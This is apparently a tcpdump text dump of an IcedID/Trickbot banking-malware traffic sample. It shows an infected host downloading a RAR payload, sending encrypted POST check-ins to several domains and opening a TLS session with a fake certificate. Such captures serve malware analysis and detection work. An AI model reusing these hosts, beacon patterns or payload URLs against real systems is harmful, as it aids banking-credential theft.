zxeHF6aHRJcVqdcaNOujgaeawDPsEqAGmr4/w3
2019-07-29 12:53:40.048521 IP 46.21.147.29.80 > 10.7.29.101.49234: Flags [.], seq 2843:4303, ack 438, win 64240, length 1460: HTTP
E……………
..e.P.Rq5~R..X.P….N..00maCBUypMWFQxMSDyrILJZUIfW1V6PnFnBZZGFQBlwGrD0w8eyrfi5KVKY/UYmAlg9Ob6AQz9sL9fOgrac2mScpFFDqx8B6tWHUfO5DZ3gKXe+Hq+WMsUMbuFbH4dlYsezuo0hnHniNRpAAuCxYEyn19E7xebnKJBp16rwB3LbP2OhwpoEhPtVNVYc+eFMNA9JBQ1mk9F/Lkbookgz2Q5ZQOmpbnpqagQWQloutSYu5u5NM+HTtNVZAns1V6xGnexCjeeTeI748NKWmdvW8wuHAMBdvJzNzLdaCLfmbCbkT7YnLcpkMHxRSp/pwaA/k0SIcUvKAR+4uKFKgKK2V1yQVlULPL55w+qR1YZj7s/vRsDHK9iqGXDRjwRauMqEj6aJabMYH8tcGz92o0DU+XaiHN1THg8hXQnsIVFcdrvdy3DgrSYwaX6SB6wj16vyc6uAbaOwY58TZNe7jRSyrxIHd+TnVGYbX0B7t9tM315IQ/8UVYHVJ7OTc5J06epbpzHZsY5VlXVrhvbp/LnCEWQCUSMVKI/v9fHljQO4z0w9PDWrrxsVetWxcDVSvPamcxg+hkx+wGmV3SmQg8EegO8qKFpfap/hgCJd4EuBFdfkKDWd7iqsWch1bcFAO2Kk5wnnqoivftNH6vLKYMtYGquVpeZDRzbxaa3et1XwiDEy6wGSBHvPARqq7sTo4HRjDYf1slg2PW0HsNnzDNaV7lPOPyBJi8W6dyvK/qKDnMa7yDE/CInmaHNIFErWXF3YG2y2w8LgTmcShVD9C/4eC4NRjFkRAmIO2pRFdIw1la1hvbPz9SGW80OMT16T70/nw4o5NT45C7bnPgl6Li7TXnvCLEcZPo38aoPzngVX5mGpLxWQO65W8Nn63qwJFMvOHfPL4UXxSDrs/od9I1griPceSIbBwDxWykgRRa3RmM7oA3nqlSFp0AMLWlT50DgcQILDGkuoAmcOk2mFPDbUuY70VUEcURbbEwt7ZRbCzgD1GzDQdHYL2dwswXxmp22xWLUYRHJE0U9O7CAqS/H69b3KaJ7vBI/B7TSXGJ3XZ9gs9A2VSCIt7hCl4qZNCWOcZsKYk0yeSKeAtdYH7vSQ8PoT+50/bK1Q39aNZhGAo2Ft6hdDynix9t+ugIRtiV2D9u9wi0xC7qVr5URmqheErnLxKlZ0ZmxDfJhM036/ixoeK8JwkYcGDvFMI7v5zNZIl/ijUTPU9pKbJ//gdj/Ml6KAKxIpWVaweUPFpPTagfK9NmquFzscCEKcHYcEXhxXsJLxrz8wNydnL1teY75mIrPG0ZnjLif012sgqpPyzNcRlb/+zEKdS7VGxk7WpkPBa8Xrk21vWJn59siPGMeIhJgPMEsrtUdiffXT5JYSOFar5mo/7dFPmXjhq5JIwE5kwBj81lKckcHi/GwMjwkfgSjT1Vkil+jGVD5jXoPzYf+OTNLHtpHrv

2019-07-29 12:53:43.474193 IP 10.7.29.101.49234 > 46.21.147.29.80: Flags [P.], seq 1076:1511, ack 500659, win 64240, length 435: HTTP: GET /images/_2B4OwFC/6vjfFP_2B9uEz70SydULkkQ/V6jakRAWYD/AOLjnZYCVGOTKqeQQ/jEaRE2qFGZsu/lTmxprbzXB2/4
2A_2FkdM3tNun/gLYbeGst8_2BWnKGu7mGT/ZW8gMjxsJDmd0ZZG/9PzwD2p8rTJNi6b/XP71k6bvIt/7.avi HTTP/1.1
E…..@… .
..e…..R.P..Z.q=..P…….GET /images/_2B4OwFC/6vjfFP_2B9uEz70SydULkkQ/V6jakRAWYD/AOLjnZYCVGOTKqeQQ/jEaRE2qFGZsu/lTmxprbzXB2/42A_2FkdM3tNun/gLYbeGst8_2BWnKGu7mGT/ZW8gMjxsJDmd0ZZG/9PzwD2p8rTJNi6b/XP71k6bvIt/7.avi HTTP/1.1
Accept: text/html, application/xhtml+xml, /
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 46.21.147.29
DNT: 1
Connection: Keep-Alive

2019-07-29 12:53:43.474326 IP 46.21.147.29.80 > 10.7.29.101.49234: Flags [.], ack 1511, win 64240, length 0
E..(…….+….
..e.P.Rq=….\EP….0..
2019-07-29 12:53:43.681682 IP 46.21.147.29.80 > 10.7.29.101.49234: Flags [.], seq 500659:502119, ack 1511, win 64240, length 1460: HTTP: HTTP/1.1 200 OK
E……….v….
..e.P.Rq=….\EP…….HTTP/1.1 200 OK
Date: Tue, 30 Jul 2019 01:16:17 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
X-Powered-By: PHP/5.4.16
Set-Cookie: PHPSESSID=nthmmr62j6fsaf2hggojf13s20; path=/; domain=.irwhfgowe.xyz
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang=en; expires=Thu, 29-Aug-2019 01:16:17 GMT; path=/; domain=.irwhfgowe.xyz
Content-Length: 2480
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

iDQg1v7keVA4gr+mxyf3wTWxsEYT5FWxPBpHhrh16rHRe9Iip2KPkI9GRO0eYWaezOnTs1o7Ln5PrFQZBtSBel/lGZtP9VH80RM3P38c12eUEsKvwdKkE/3VZ6an6nVoZZ3T19GKf9DttVcerLiQv5tBKRKV+iZjg24EesCMirABxLQ+wTJzpN8kfTBrQMDWvypvRaxTAhqhcZaRq26/freNXboiT+ZAPNy+sPgowSK
6BtAP1WduOiF712W9t6Cdk80L4PL+xleVk1BDVlVW7g4dnuI4E1WE2kn+/CMJ/Kf2AG5RctwNGk4BkH9jYf24NjVynFk385fvuOrZ9se2yaY3xh147eK5mxumEXWfJ/0yvBDv7CpZHU+YEdzqIIikvPq7U6hdihZC7CfSQjmdJ9qU1nHfrMK6yTkXmjyR0grJshmTZN3KYgY81qMQXIvHvAcT6GU2KzmaBIeIA293m4
gC0mKNB1ck1l9DowLnu/g7NCcXZIKBCSDjlEDzrEV5T/YpqsoLvdMrpKUruqu54aW20bFCxejhrqtPia357tA2MFdl3xVm4XNq5+RIwOW2ELoenaXIm1FZuEuxJyadbyvcqofZX1jXhsg7G/74q0fxC8fkz2veauD9rOwlieO9M/bw5gH8DDS8NTummTzX+xU9QPfCEh2nYJL7/S0d6eOadYY5ik2ALj7pU4rEWCPPS
umt190uprB6A9c3udOXgoPejyeuCLQKUB9UxhMgxdsGOoVJPDdSfoqGHlT8a9UGrg6F0rCFAVBDxo0TXC+SaKu78hipFnneaVTHYxi/tLw088dQkzc1PmtnNOFqUXWBirxiBWw2rsGD6wOdO/YjSm8Mdo8AEfd6B39F0rFo78boD/zyLaRm+2g7bE2s7QWyvA9q3NKNW+nFLz
2019-07-29 12:53:43.681709 IP 46.21.147.29.80 > 10.7.29.101.49234: Flags [.], seq 502119:503579, ack 1511, win 64240, length 1460: HTTP
E……….u….
..e.P.Rq=….\EP…….Co8FRj6uTHdUAWhlgWreY51ooBHc1MWFrjvK6UUn5eAL9/xk0x24lVA/OPovbIZimxhyf3PCWxCWdHw0bQPPXEDYj6hRW7fZPMXzJZYAOcHFhAI5fdYIaQCYggVaYGuOqc0Zd91kKpapMNSUbz75oGEAeP/Zi52AlzLKtinJugHJfmiQb8427B7+PIWoRUhYZYBpyo49e/rhwaDlMpQl
SWuPZ/paqVnte83KWzj4/X8cH7CE4sckayWIntW8xeow9bvOffNMmaQrD5Bw+T9SE2CovTyZxej65akzcJAdEmd5uqXXU4qBkJvk50qT8tArWpv/y3DXZ5JdCTUhtF4q8IIuiq7P89s1SiQqGrMZXimGuCp9HA9uL8lmXOV0+frB9lFker1nkrtJZzEI6KdKO7iCGgXpu/blj/FQe/ztkEZ9UmCHI5vlDYOdYKMi6Jo
gZfdkZTISsrYWcnY1mIrGs1LRcfrckFrOES3prQ/EfNANOL9MhzmfRwvY+ZBpyQMWrDFtGpM+h9Sw2emgfWFtdLRV6g5mDEvuyteyAY3Z9tggaeq4kqdc5YHUXHyA82g5Zy46VbsrgfWE7tyyJAV7JMZ0yNqxF/oTd2JqKxgypPb1EL0M94CmmXnPOZALL7lwcUF7wcp8gp2I9RsfvN2em+T9MbY1PaKHr77+9m7T7z
GyBdWE1H2W1j2J/HIqwe9Z4JuMV1ZXSrwldKYpl1UaGBU8+T/s8Dzwwk7WOO/FybjcTO+D9lZVUX0Mq34j7avx3gbU2dTAKaAhfRwJ72MCq/UgaowkMk60Y7eMIc8IrRJ4e0/RzU/o82BGuG2mYkLNsL58cl5KB+/c7Nr2G08h5kZ08pVHMA2MBmHw4ugLOzb5xLjQG6f5Tsaq
X1kBbojRReBfy4NhzI9gQ5lfi6
gJkxWovKr4Btyy840zDiJMTR+IqCC9YLr1RyAZiKu19vtqrapY/RD5SG7zAQBVgUOJlKfV+HnVhxiN2haFhif2ZaAe5ADAzdiiOO4SLrus3RTwUETUOulf2pjdQaoDZJzqZ7xqDy28WVRasqO2Uy7w/ElhUNdOT7EXkBhvznV2PcBLjtkpai8/1fiRlPG9alpuXyMdbPOTcnNonbbwvIgpX1oQWmlCL3PVrmVfuQ3vB
dQKVKY5RkFJO0qSzkm8zSWe8YOTUC8LPDE8Ni58m/8ZNjQlaxECbeFIiTJO3Xa6S4dtq5odlHslN8XE4JE2/mmIzb3vYXVR6srXxKWm2O5GBkYcKaq6NtDvnoaeRuzXwlLsKovhbqUHWiSdQe/EBuq0IEYFpc15Qgm3QgCQ7u6fuKqohRadP0vvzb3zgJ0bOwfNOypnsLt4AnOsgxZofDVtiM81JYRCCD+Jo6pOJqWd
IQYawzJb1gfNL5gGH3/JSS1xLyiZ483xa/BDtgvU5Uz0jjCGjURD+S2P69TlL0eQ66ntI1D8/

2019-07-29 13:00:51.068034 IP 10.7.29.101.49247 > 109.123.223.76.80: Flags [P.], seq 1:179, ack 1, win 64240, length 178: HTTP: GET /demo/PhotoA.rar HTTP/1.1
E…..@…~.
..em{.L._.P…… 6P…)…GET /demo/PhotoA.rar HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64)
Host: kacafirek.cz
Connection: Keep-Alive
Cache-Control: no-cache

2019-07-29 13:00:51.068133 IP 109.123.223.76.80 > 10.7.29.101.49247: Flags [.], ack 179, win 64240, length 0
E..(……..m{.L
..e.P... 6…XP…z… 2019-07-29 13:00:51.258107 IP 109.123.223.76.80 > 10.7.29.101.49247: Flags [.], seq 1:1461, ack 179, win 64240, length 1460: HTTP: HTTP/1.1 200 OK E……….4m{.L ..e.P... 6…XP…….HTTP/1.1 200 OK
Date: Mon, 29 Jul 2019 17:00:51 GMT
Server: Apache
Last-Modified: Mon, 29 Jul 2019 08:06:23 GMT
ETag: “e60124-3eea3-58ecd5e2cfdc0”
Accept-Ranges: bytes
Content-Length: 257699
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-rar-compressed

2019-07-29 13:00:58.982371 IP 10.7.29.101.53764 > 172.16.5.2.53: 23168+ A? www.vitaindu.com. (34)
E..>.-….Z.
..e…….5..DZ…………www.vitaindu.com….. 2019-07-29 13:00:58.982627 IP 10.7.29.101.63732 > 172.16.5.2.53: 20475+ A? www.pr-park.com. (33) E..=……Z. ..e…….5.)..O…………www.pr-park.com….. 2019-07-29 13:00:58.982894 IP 10.7.29.101.65154 > 172.16.5.2.53: 28480+ A? www.2print.com. (32) E..<./….Z. ..e…….5.(..o@………..www.2print.com….. 2019-07-29 13:00:58.984127 IP 10.7.29.101.54427 > 172.16.5.2.53: 60399+ A? www.crcsi.org. (31) E..;.1….Z. ..e…….5.’.k………….www.crcsi.org….. 2019-07-29 13:00:58.987089 IP 10.7.29.101.49386 > 172.16.5.2.53: 17994+ A? www.spanesi.com. (33) E..=.2….Z. ..e…….5.).PFJ………..www.spanesi.com….. 2019-07-29 13:00:58.987781 IP 10.7.29.101.58486 > 172.16.5.2.53: 43542+ A? www.owsports.ca. (33) E..=.3….Y. ..e…..v.5.).A………….www.owsports.ca….. 2019-07-29 13:00:58.989882 IP 10.7.29.101.54356 > 172.16.5.2.53: 39383+ A? www.rs-ag.com. (31) E..;.4….Z. ..e…..T.5.’……………www.rs-ag.com….. 2019-07-29 13:00:58.991007 IP 10.7.29.101.60036 > 172.16.5.2.53: 34096+ A? www.c9dd.com. (30) E..:.5….Z. ..e…….5.&…0………..www.c9dd.com….. 2019-07-29 13:00:58.992556 IP 10.7.29.101.53486 > 172.16.5.2.53: 64159+ A? www.udesign.biz. (33) E..=.6….Y. ..e…….5.))…………..www.udesign.biz….. 2019-07-29 13:00:58.993571 IP 10.7.29.101.57888 > 172.16.5.2.53: 32553+ A? wpad.localdomain. (34) E..>.7….Y. ..e….. .5.p..)………..wpad.localdomain…..
2019-07-29 13:00:59.054760 IP 172.16.5.2.53 > 10.7.29.101.58486: 43542 2/0/0 A 198.105.254.64, A 198.105.244.64 (65)
E..].r……….
..e.5.v.I……………www.owsports.ca………………i.@………….i.@
2019-07-29 13:00:59.058581 IP 10.7.29.101.49248 > 198.105.254.64.80: Flags [S], seq 1756324796, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.8@….v
..e.i.@..Ph.c....... ................. 2019-07-29 13:00:59.059556 IP 172.16.5.2.53 > 10.7.29.101.53486: 64159 2/0/0 A 198.105.254.64, A 198.105.244.64 (65) E..].s.......... ..e.5...I$..............www.udesign.biz..................i.@.............i.@ 2019-07-29 13:00:59.060024 IP 10.7.29.101.49249 > 198.105.254.64.80: Flags [S], seq 331088107, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0 E..4.9@....u ..e.i.@.a.P.......... ................. 2019-07-29 13:00:59.070348 IP 172.16.5.2.53 > 10.7.29.101.49386: 17994 2/2/4 A 104.26.2.86, A 104.26.3.86 (204) E....t.......... ..e.5....P.FJ...........www.spanesi.com.................h..V............h..V.............jean.ns cloudflare...............ben.R.n............;g.n..........$... I........;g.M............:y.M..........$... I........:y 2019-07-29 13:00:59.070711 IP 10.7.29.101.49250 > 104.26.2.86.80: Flags [S], seq 4069494565, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0 E..4.:@....
..eh..V.b.P…%…… .z……………
2019-07-29 13:00:59.083033 IP 172.16.5.2.53 > 10.7.29.101.54356: 39383 2/2/4 A 104.31.73.201, A 104.31.72.201 (203)
E….u……….
..e.5.T……………..www.rs-ag.com……………..h.I………….h.H…………..karl.ns
cloudflare……………jade.P.K…………;..K……….$… I……..;..l…………:..l……….$… I……..:.
2019-07-29 13:00:59.083341 IP 10.7.29.101.49251 > 104.31.73.201.80: Flags [S], seq 4209286921, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.;@….5
..eh.I..c.P… …… ……………..
2019-07-29 13:00:59.092781 IP 172.16.5.2.53 > 10.7.29.101.60036: 34096 2/2/4 A 104.25.152.27, A 104.25.153.27 (202)
E….v……….
..e.5…….0………..www.c9dd.com……………..h……………h…………….rita.ns
cloudflare……………west.O.J…………:..J……….$… I……..:..k…………;..k……….$… I……..;.
2019-07-29 13:00:59.093130 IP 10.7.29.101.49252 > 104.25.152.27.80: Flags [S], seq 2628897602, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.<@….. ..eh….d.P…B…… …………….. 2019-07-29 13:00:59.124030 IP 172.16.5.2.53 > 10.7.29.101.54427: 60399 2/2/4 CNAME crcsi.org., A 198.12.145.135 (204)
E….w……….
..e.5….h)………….www.crcsi.org…………………………………………ns56.domaincontrol.com…………..ns55.N.I…………K..I……….&…”…………m……….aJk..m……….&…!………..
2019-07-29 13:00:59.124420 IP 10.7.29.101.49253 > 198.12.145.135.80: Flags [S], seq 3693053252, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.=@…s.
..e…..e.P…D…… ……………..
2019-07-29 13:00:59.134787 IP 104.26.2.86.80 > 10.7.29.101.49250: Flags [S.], seq 1144726242, ack 4069494566, win 64240, options [mss 1460], length 0
E..,.x…..wh..V
..e.P.bD;”….&...a....... 2019-07-29 13:00:59.134962 IP 10.7.29.101.49250 > 104.26.2.86.80: Flags [.], ack 1, win 64240, length 0 E..(.>@....
..eh..V.b.P…&D;”.P…y…
2019-07-29 13:00:59.135089 IP 10.7.29.101.49250 > 104.26.2.86.80: Flags [P.], seq 1:771, ack 1, win 64240, length 770: HTTP: POST / HTTP/1.1
E..*.?@…].
..eh..V.b.P…&D;”.P…….POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 536
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.spanesi.com
Cache-Control: no-cache

Ax7m7VKupQADayozBXlPTlW3Rb+iyGxupqnfz1KXuEtJqsumvHWGTXgJ3la7IYWyy0wrfcd5tq0Nv67QGRfa37je7asRoaeUZBk3+iNqzlDQfA5IlmanUWhBkpt6ZvKUdmZZ09qLi6STnTf1e8iYiZFDHV044pCuy5LeLxK83OAITgApwVagHdhrfPJ0aVaMwjbgjaLz/50Y1fI2IXTVCi3T1cJt3/qeUYHullfNxq/RhDqhf0+7FujpJC/mzBY9wTmslIDYVlPBBkxidBjvOXZbqxwXVr+tpsacYBRwCAUzqodwinxWAE+dL0w39CJzQkeDpIsP7Ie+uXE82zpN4CVrDcdENT1FKfEoSEgyIhif8lf4AEWirBJ8H7KfdQFT+rWN11eEqNzZcI0neS/w6AhPyUsXP8M7DI2Zhm3/1gkVs6MteuCbYZ6nXSHMa1T1txVasJ8QIuIXOBeHEj+6bmVcFiZbiFuVztE6eZJsE6lehw52lhdoJ5y+6s0lkNiWzYvmi/zEedIjhAJc02zaoQ==
2019-07-29 13:00:59.135140 IP 104.26.2.86.80 > 10.7.29.101.49250: Flags [.], ack 771, win 64240, length 0
E..(.y…..zh..V
..e.P.bD;”….(P…v~..
2019-07-29 13:00:59.153346 IP 172.16.5.2.53 > 10.7.29.101.65154: 28480 2/2/4 CNAME 2print.com., A 184.168.221.53 (202)
E….z……….
..e.5….~.o@………..www.2print.com…………………………….5………….ns27.domaincontrol……………ns28.O.J……….aJg..J……….&…!q………..k…………G..k……….&…”q……….
2019-07-29 13:00:59.153873 IP 10.7.29.101.49254 > 184.168.221.53.80: Flags [S], seq 1193526277, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.@@…5:
..e…5.f.PG#…….. ……………..
2019-07-29 13:00:59.155302 IP 104.31.73.201.80 > 10.7.29.101.49251: Flags [S.], seq 355223488, ack 4209286922, win 64240, options [mss 1460], length 0
E..,.{……h.I.
..e.P.c.,G….
`….B……
2019-07-29 13:00:59.155392 IP 10.7.29.101.49251 > 104.31.73.201.80: Flags [.], ack 1, win 64240, length 0
E..(.A@….;
..eh.I..c.P…
.,G.P…#…
2019-07-29 13:00:59.155532 IP 10.7.29.101.49251 > 104.31.73.201.80: Flags [P.], seq 1:773, ack 1, win 64240, length 772: HTTP: POST / HTTP/1.1
E..,.B@….6
..eh.I..c.P…
.,G.P…Nn..POST / HTTP/1.1
Accept: /
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 540
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.rs-ag.com
Cache-Control: no-cache

XXTc5yB8pQDhZhbvcwBrU1OYKjSIHRfuVCXVJsqxREL8MU9UVfvk6NEGuk8mLn6d9of2goBzO4ncAiRL0nhgYuUZIkCk/czwzlMog/4/3ohpHmcPJ7e2pFZfvWGSSgdnBNt/1Wk2SJ2JiG4yx4XMfJ9wvPi9Ka8XgZYU43vQIqgC+k8tEmMcmqYPXVOe7LApGAcTprzV80reoZUgsQcC7XVKzYwYBqiyFZdClmwgpge3ALD2XNTtaHw75PuO1i2pgc3zcV0WOt0ulFzN6IexXdr62goFpRuT2aQdjNI9ZUYpWxLs0uWgjFhM1Os7djM7Pjtn0rX2jKQHFnr9i3565oL0jsqhNqphYFWeMsY+VwYxJJBe08X0CnEPO6N5x3eyqTzKSWDM7+un3diIY20b7H6iBnMRF5xV9YZBtLNHP5p+03UFutC3RqBlQVwuvdphGuymo8uHmHdhvwOYyR2sU1AABoZHo66XaXj8JflxcbSWTmzbuOS+ZySWEEei2bAPsaUlWRndr9aVx35jZOsH8psKMw==
2019-07-29 13:00:59.155592 IP 104.31.73.201.80 > 10.7.29.101.49251: Flags [.], ack 773, win 64240, length 0
E..(.|……h.I.
..e.P.c.,G…..P… …
2019-07-29 13:00:59.171901 IP 104.25.152.27.80 > 10.7.29.101.49252: Flags [S.], seq 924723558, ack 2628897603, win 64240, options [mss 1460], length 0
E..,.}….b.h…
..e.P.d7.)f…C`….V……
2019-07-29 13:00:59.172132 IP 10.7.29.101.49252 > 104.25.152.27.80: Flags [.], ack 1, win 64240, length 0
E..(.C@…..
..eh….d.P…C7.)gP…….
2019-07-29 13:00:59.172470 IP 10.7.29.101.49252 > 104.25.152.27.80: Flags [P.], seq 1:768, ack 1, win 64240, length 767: HTTP: POST / HTTP/1.1
E..’.D@…..
..eh….d.P…C7.)gP….u..POST / HTTP/1.1
Accept: /
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 536
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.c9dd.com
Cache-Control: no-cache

biRN0zTRpADIHVQlj0s8Xof2rF4sqrrVqBmtdiNN5r1aTGBCayDDw/GsDOn3drrVedvEeN/rz1NDDypzGUjdXX87PABis7mAdVShJmNAFzWiqtIbOTiF0mAlofT86Dj3ZA+lPMiQGBMzW1P6aRP5qR+btt2+T8j0dqUdUb+aJnjlneEERgnq595Ot8a/17XcGtdlcA+Yz2MbGK4RzYaWtdZGvTfM9zEkCRIiSCYvyVlYyV2Jqd7ehNDm0f9iIynTF3vZ9d1JTCLd9EuORzj4s5RjPWn7We1XfGVlafFt7upU1qtbVkc7OyEMavyhra8fa0PPevqlrT1x/tcYPbFEuJ5a6cLsjN7WH+3EGMRCW9xThRDB1XsDYmuC7WFYZtbUthL/S7Em+rhFbBkXxXToRhyhzCDz9WVI2qroJGIBkbCAsY44QfNUH5j0VoXufYlUSjL5A37rGZtJtJ87e3Wlr/2GEd5mGUv9P5+lEnbE9ZJEE/+SpZPFMgjqo2+y6LZQnyPwwLkG17ZxSd7ZYqcrUNg/

2019-07-29 13:00:59.687314 IP 10.7.29.101.52012 > 172.16.5.2.53: 33479+ A? www.vazir.se. (30)
E..:.o….Y.
..e…..,.5.&%3………….www.vazir.se…..
2019-07-29 13:00:59.699312 IP 58.64.191.148.80 > 10.7.29.101.49259: Flags [S.], seq 687621463, ack 3876635042, win 64240, options [mss 1460], length 0
E..,……h.:@..
..e.P.k(.EW….`….”……
2019-07-29 13:00:59.699454 IP 10.7.29.101.49259 > 58.64.191.148.80: Flags [.], ack 1, win 64240, length 0
E..(.p@…..
..e:@…k.P….(.EXP…….
2019-07-29 13:00:59.699544 IP 10.7.29.101.49259 > 58.64.191.148.80: Flags [P.], seq 1:756, ack 1, win 64240, length 755: HTTP: POST / HTTP/1.1
E….q@….+
..e:@…k.P….(.EXP…….POST / HTTP/1.1
Accept: /
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 520
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.vitaindu.com
Cache-Control: no-cache

8IlD6Hp/pQBUVUU1HQiLqL0qEQfqhORoTjln6RJOQ15jryfneNJiY86EOVLCoqU8bm0OsgXpA0255OV/bAT01clkJeyVjje3bxnPyOvfUsPdp3RPMckUExFs8ujM0HXhFPAwBD3zV8qMRTWUMmJ6279Vl4oR4y8nMYNUzUT6wR28tmL6c8XsaVi4OBQu2Nq/IKf6OeD7IWIFGjE0V7Z38R/syLDaPfmBm0j04GoUIPqmB01zH2k/Br0302lD9sG/tg3odcCXvrktL/YlCBy4NfihYgr8CxaZa4HPM1oVPyusFQHhfw9DDZ/X7aFC+nL8KeKhCK3RtjW4/4McUWA/fw3thufPiTO+fU6adClg6cz69ImGjn9e7M5+A+gcNHnLWNCqkDLoGPRFzTRjKk6Q9hbQQeX/ZidGdK0i+u1ldp2Btm89r0Ct0WSdAigO04vXdHZzaLphNqT/N7liOfi1IT4tX4U+0diO4uC+X699Z6Qf+DftG+NLC4Je+8Wpm+/6+HnqxHQ=
2019-07-29 13:00:59.699603 IP 58.64.191.148.80 > 10.7.29.101.49259: Flags [.], ack 756, win 64240, length 0
E..(……h.:@..
..e.P.k(.EX….P…….
2019-07-29 13:00:59.782318 IP 172.16.5.2.53 > 10.7.29.101.58389: 12756 1/2/2 A 210.140.73.39 (142)
E……………
..e.5….O.1…………www.ex-olive.com……………….I’………….ns01.telewave.ad.jp…………..ns01.epressd.O._…………JR.>………..z.2
2019-07-29 13:00:59.783153 IP 10.7.29.101.49262 > 210.140.73.39.80: Flags [S], seq 3843601751, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.r@….2
..e..I’.n.P…W…… ……………..
2019-07-29 13:00:59.819475 IP 157.7.107.91.80 > 10.7.29.101.49255: Flags [P.], seq 13821:15203, ack 811, win 64240, length 1382: HTTP
E………T…k[
..e.P.g)…..NSP…….2.528c.494-.542.973-1.114 1.5-1.716.449-.544.869-1.111 1.257-1.7l.15-.226c.329-.481.659-.983.988-1.505.329-.522.599-.963.808-1.324l.4-.692c1.607-2.889 2.963-5.91 4.055-9.03 2.459-7.089 3.861-14.502 4.16-22 0-.773.03-1.556.09-2.348 7.811 2.273 17.1 5.433 20.726 8.157 2.257 2 4.155 19.52 5.427 42.428h3.666c-1.332-21.91-3.381-42.477-7.013-45.182-4.658-3.512-16.387-7.25-24.858-9.593l-8.558-4.257c-.674-.339-1.488-.219-2.035.3l-5.791 5.523-4.25 4.034-4.19-4.079-5.731-5.569c-.54-.53-1.355-.662-2.035-.331l-8.784 4.289c-8.47 2.273-20.022 5.87-24.646 9.286-3.685 2.715-5.645 23.414-6.68 45.574h3.652zm57.856-53.069l.628-.783.284-.271 1.18-1.128.254.12 3.906 1.957 2.918 1.5v.135l-4.744 12.04-8.694-5.794-2.32-1.5 6.588-6.276zm-28.013 1.159l2.993-1.5 3.846-1.881.21-.06.09.075 1.407 1.37h.075l.569.557 6.51 6.366-2.245 1.5-8.829 5.779-4.621-12.04-.005-.166zm2.14 15.577c.194.505.606.894 1.12 1.061.514.167 1.076.092 1.529-.203l10.475-6.893 3.292-2.152 3.307 2.243 10.475 6.923c.45.303 1.013.386 1.53.225.518-.161.935-.548 1.134-1.053l1.766-4.515c-.686 4.963-1.905 9.837-3.636 14.539-.932 2.49-2.053 4.905-3.352 7.224l-.389.662-.7 1.174c-.359.572-.718 1.1-1.062 1.61l-.21.3c-.344.5-.7.963-1.047 1.4l-.434.527c-.344.406-.673.8-1.018 1.159-.689.743-1.429 1.436-2.215 2.075h-8.863c-.765-.637-1.485-1.326-2.155-2.062-.359-.391-.7-.8-1.062-1.249l-.374-.452c-.359-.467-.733-.963-1.092-1.505l-.1
2019-07-29 13:00:59.819587 IP 10.7.29.101.49255 > 157.7.107.91.80: Flags [.], ack 15203, win 62858, length 0
E..(.s@…..
..e..k[.g.P..NS)..%P….B..
2019-07-29 13:00:59.820412 IP 157.7.107.91.80 > 10.7.29.101.49255: Flags [P.], seq 15203:16585, ack 811, win 64240, length 1382: HTTP
E………T…k[
..e.P.g)..%..NSP…….5-.226c-.374-.542-.733-1.1-1.107-1.7l-.434-.722c-.209-.346-.418-.707-.629-1.084-1.273-2.322-2.369-4.737-3.277-7.224-1.852-5.166-3.093-10.53-3.7-15.984l2.278 5.902zm49.653 36.333l.1-25.993c.016-.483-.162-.953-.494-1.305-.331-.351-.79-.553-1.272-.561-.239-.011-.478.03-.7.12-.678.284-1.115.951-1.107 1.686v26.053h3.473zm-36.288-26.189c.328 1.337 1.526 2.277 2.903 2.277s2.575-.94 2.903-2.277c.157-.858-.076-1.741-.636-2.409-.558-.666-1.384-1.047-2.253-1.038l.075.015c-.885-.038-1.74.328-2.322.996-.582.668-.829 1.564-.67 2.436zm2.946 6.2v.015c-.968-.014-1.88.452-2.437 1.244-.556.792-.685 1.808-.343 2.714.456 1.128 1.552 1.867 2.769 1.867s2.313-.739 2.769-1.867c.058-.152.103-.308.13:

IcedID Iced ID and Trickbot Banking Malware Trojan Downloader Dropper PCAP file download traffic sample

2019-08-12 14:04:16.655885 IP 10.8.12.101.49224 > 179.60.144.143.443: Flags [P.], seq 1:119, ack 1, win 64240, length 118
E…. @…..
..e.<…H…4E…D.P…E…….q…m..]Q. k…,..V…kl…k…..$….!…./.5… ….. . .2.8…….,…………..wrotection.pro. ………….. 2019-08-12 14:04:16.655968 IP 179.60.144.143.443 > 10.8.12.101.49224: Flags [.], ack 119, win 64240, length 0
E..(. …..v.<.. ..e…H..D..4FWP….2.. 2019-08-12 14:04:16.841099 IP 179.60.144.143.443 > 10.8.12.101.49224: Flags [P.], seq 1:810, ack 119, win 64240, length 809
E..Q.!…..L.<..
..e…H..D..4FWP………..Q…M……W……g…:…p…../.*…Z …m….s.G.Z..sN6~.._.d..V=.._a./…………………..0…0.. …… ..d…..&0.. *.H……..0s1.0 ..U….US1.0 ..U….NJ1.0…U.
..belles fogginess’s1.0…U….introversion’s cashier1.0…U….indecisively.org0…190630040001Z..200629040001Z0s1.0 ..U….US1.0 ..U….NJ1.0…U.
